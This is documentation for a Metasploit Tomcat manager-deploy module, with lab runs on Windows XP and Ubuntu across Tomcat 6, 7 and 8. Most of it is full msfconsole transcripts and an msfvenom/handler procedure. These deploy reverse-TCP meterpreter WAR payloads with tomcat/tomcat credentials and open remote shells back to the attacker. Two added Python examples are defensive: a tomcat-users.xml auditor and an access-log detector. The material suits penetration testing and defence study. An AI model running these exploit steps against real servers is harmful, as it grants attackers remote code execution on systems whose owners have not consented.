Documentation Format
This documentation differs slightly from the standard module documentation because the variables, privileges and versions involved change how exploitation happens. It is broken down by OS, then Tomcat version, then privilege level, to show exploitation under each combination.
Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually.
Windows (XP SP2)
Tomcat 6 (6.0.48)
Setup
The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role manager-gui, which is Tomcat 7+ syntax; for this exploitation it was changed to simply manager.
text/script Interface
- Edit C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml to add the following under the <tomcat-users> line:
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
- Restart Tomcat service
- Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > set rport 8086
rport => 8086
msf exploit(tomcat_mgr_deploy) > set path /manager
path => /manager
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6071 bytes as scEYoK0.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
[*] Undeploying scEYoK0 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Tomcat 7 (7.0.73)
Setup
The install was default, other than adding a user during install. No other options were changed.
Of note, the installer gave the user the manager-gui role but did not actually define that role in tomcat-users.xml, so the /manager/html page was visible but deploying from it was not possible.
text/script Interface
- Edit C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml to add the following under the <tomcat-users> line:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
- Restart the service
- Exploitation:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set payload java/
set payload java/meterpreter/bind_tcp
set payload java/meterpreter/reverse_tcp
set payload java/shell_reverse_tcp
set payload java/meterpreter/reverse_http
set payload java/shell/bind_tcp
set payload java/meterpreter/reverse_https
set payload java/shell/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Tomcat 8 (8.0.39)
Setup
The install was default, other than adding a user during install. No other options were changed.
Of note, the installer gave the user the manager-gui role but did not actually define that role in tomcat-users.xml, so the /manager/html page was visible but deploying from it was not possible.
text/script interface
- Edit C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml to add the following under the <tomcat-users> line:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
- Restart the service
- Exploitation:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Linux
Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
Setup
- Install Tomcat and dependencies:
sudo apt-get install tomcat6 tomcat6-admin
Exploit
- Edit /etc/tomcat6/tomcat-users.xml to add the following:
<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>
- Restart Tomcat:
sudo service tomcat6 restart
- Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
rport => 8080
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
Meterpreter : x86/linux
Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
Of note, as of Tomcat 7 the 'manager' role has been split into several sub-roles. Which sub-role the user holds determines the path variable needed for exploitation.
Setup
- Install Tomcat and dependencies:
apt-get install tomcat7 tomcat7-admin
text/script interface
- Edit /etc/tomcat7/tomcat-users.xml to add:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
- Restart Tomcat:
sudo service tomcat7 restart
- To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy; you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied
- Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > exploit
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
[*] Undeploying 9QymzSGGU0H4e ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
Meterpreter : x86/linux
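The tomcat-users.xml edits in the Setup sections above, and the Tomcat 7+ role split just described, are exactly what a defender should audit for. The following Python script is an added example, not part of this module or its documentation: it parses a tomcat-users.xml, reports which users hold a manager role, which Manager path that role exposes, and whether the account uses a default credential pair (the credential list and the sample file are constructed for the example).

```python
import xml.etree.ElementTree as ET

# Manager roles and the interface each one opens. "manager" is the Tomcat 6
# role; the rest are the Tomcat 7+ sub-roles the text above refers to.
ROLE_TO_PATH = {
    "manager": "/manager (Tomcat 6: full manager access)",
    "manager-script": "/manager/text (scriptable deploy/undeploy)",
    "manager-gui": "/manager/html (browser deploy via WAR upload)",
    "manager-jmx": "/manager/jmxproxy",
    "manager-status": "/manager/status (read-only)",
}
DEPLOY_ROLES = {"manager", "manager-script", "manager-gui"}
# Credential pairs that should never survive into production (assumed list).
WEAK_CREDS = {("tomcat", "tomcat"), ("admin", "admin"), ("admin", ""), ("tomcat", "s3cret")}

# Constructed sample mirroring the tomcat-users.xml edit described above.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="tomcat" roles="manager-script"/>
  <user username="monitor" password="Xk7#longRandomValue" roles="manager-status"/>
  <user username="app" password="irrelevant" roles="webapp-user"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return one finding per user holding any manager role:
    (username, sorted manager roles, exposed paths, list of problems)."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] != "user":  # strip the tomcat-users namespace
            continue
        name = elem.get("username") or elem.get("name") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",")} & ROLE_TO_PATH.keys()
        if not roles:
            continue
        problems = []
        if roles & DEPLOY_ROLES:
            problems.append("can deploy a WAR: a guessed password is remote code execution")
        if (name, elem.get("password") or "") in WEAK_CREDS:
            problems.append("default/weak credentials")
        findings.append((name, sorted(roles), [ROLE_TO_PATH[r] for r in sorted(roles)], problems))
    return findings

if __name__ == "__main__":
    for name, roles, paths, problems in audit_tomcat_users(SAMPLE_XML):
        print(f"{name}: roles={roles} exposes={paths} problems={problems or 'none'}")
```

Digested passwords will not match the plaintext list, so the credential check only catches accounts stored in the clear, as in the edits above.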
gui interface
I attempted to get the GUI one to work, but wasn't able to. I believe you need to set the permission manager-gui, and possibly alter PATH to /manager/html. However, my attempts were unsuccessful.
Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of Tomcat 7 the 'manager' role has been split into several sub-roles. Which sub-role the user holds determines the path variable needed for exploitation.
Setup
apt-get install tomcat8 tomcat8-admin
text/script interface
- Edit /etc/tomcat8/tomcat-users.xml to add:
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
- Restart Tomcat:
sudo service tomcat8 restart
- To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy; you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied
- Exploit:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set verbose true
verbose => true
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)
Architecture : x64
Meterpreter : x86/linux
gui interface
I attempted to get the GUI one to work, but wasn't able to. I believe you need to set the permission manager-gui, and possibly alter PATH to /manager/html. However, my attempts were unsuccessful.
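Every msfconsole transcript above shows the same three-step sequence on the server: a WAR is uploaded through the Manager path, its JSP is requested once, and the context is undeployed again within seconds. The following Python is an added example, not part of the module, that looks for that shape in Tomcat access logs; the log lines are constructed to mirror the Tomcat 7 run above, and the default AccessLogValve pattern is assumed.

```python
import re
from datetime import datetime, timedelta

# Constructed Tomcat access-log lines (default AccessLogValve layout
# %h %l %u %t "%r" %s %b) for the upload / execute / undeploy sequence above.
SAMPLE_LOG = """\
192.168.2.117 - tomcat [14/Jan/2017:14:27:20 -0500] "PUT /manager/text/deploy?path=/Cl6t6gurtwIO59zV3Lt6 HTTP/1.1" 200 63
192.168.2.117 - - [14/Jan/2017:14:27:21 -0500] "GET /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp HTTP/1.1" 200 0
192.168.2.117 - tomcat [14/Jan/2017:14:27:21 -0500] "GET /manager/text/undeploy?path=/Cl6t6gurtwIO59zV3Lt6 HTTP/1.1" 200 45
10.0.0.5 - deploy [14/Jan/2017:15:02:10 -0500] "PUT /manager/text/deploy?path=/billing HTTP/1.1" 200 60
10.0.0.9 - - [14/Jan/2017:16:40:00 -0500] "GET /billing/index.jsp HTTP/1.1" 200 812
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
# Tomcat 6 uses /manager/deploy, Tomcat 7+ /manager/text/deploy (the path variable above).
MGR_RE = re.compile(r'^/manager(?:/text)?/(?P<cmd>deploy|undeploy)\?.*?path=(?P<ctx>/[^&]*)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def find_drive_by_deploys(log_text, window=timedelta(minutes=5)):
    """Return (context, deploying ip, requests served) for every context that was
    deployed through the Manager app and undeployed again within `window`.
    Normal releases stay deployed; deploy, run one JSP, undeploy is the exploit's shape."""
    deploys, hits, alerts = {}, {}, []
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["status"] >= 400:   # only successful requests matter here
            continue
        m = MGR_RE.match(rec["url"])
        if m:
            ctx = m.group("ctx")
            if m.group("cmd") == "deploy":
                deploys[ctx], hits[ctx] = rec, []
            elif ctx in deploys and rec["ts"] - deploys[ctx]["ts"] <= window:
                alerts.append((ctx, deploys.pop(ctx)["ip"], hits[ctx]))
            continue
        for ctx in deploys:                    # requests into a freshly deployed context
            if rec["url"].startswith(ctx + "/"):
                hits[ctx].append(rec["url"])
    return alerts
```

Uploads through the HTML interface, as in the manual procedure below, arrive as a POST to /manager/html/upload without a path parameter and are not matched by this check.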
Manual Exploitation
Create payload
This was performed on Windows XP, logged in as a user with the following role on each version:
- Tomcat 6.0.48: manager
- Tomcat 7.0.73: manager-gui
- Tomcat 8.0.39: manager-gui
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
Setup Handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
Deploy
- With a web browser, browse to http://<ip>:<port>/manager/html
- Enter credentials (no default)
- Under Deploy > WAR file to deploy, click Browse to select meterp.war, then click Deploy. meterp should now be listed under Applications, meaning it was successfully deployed.
- Either click the link for /meterp or browse to http://<ip>:<port>/meterp/
Callback
After browsing to that page, code execution will happen, and your callback will hit.
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Cleanup
This will NOT remove the meterpreter WAR from Tomcat; click Undeploy next to meterp in the Applications list to remove it from Tomcat.